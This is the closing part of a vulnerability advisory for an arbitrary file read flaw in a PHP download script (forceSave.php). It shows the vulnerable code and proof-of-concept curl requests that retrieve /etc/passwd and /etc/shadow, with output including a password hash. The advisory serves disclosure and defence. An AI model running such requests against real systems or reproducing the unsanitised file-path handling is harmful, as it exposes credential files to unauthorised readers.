57. header("Content-Disposition: attachment; filename=" . basename($filename) . ";");
58. header("Content-Transfer-Encoding: binary");
59.
// Both filesize() and readfile_chunked() receive the untrusted path as-is.
60. header("Content-Length: " . filesize($filename));
61.
62. set_time_limit(0);
63. readfile_chunked($filename, false);
64.
65. exit();
66. }
67.
68. ?>
======================================================================
Tested on: Debian GNU/Linux 3.1
Apache
PHP/5.4.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5447
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php
20.12.2017
--
# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
games:x:5:100:games:/usr/games:/bin/sh
...
...
# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/shadow"
root:LUUVeT6GbOy9I:10978:0:99999:7:::
daemon:*:10979:0:99999:7:::
bin:*:10979:0:99999:7:::
sys:*:10979:0:99999:7:::
sync:*:10979:0:99999:7:::
games:*:10979:0:99999:7:::
...
...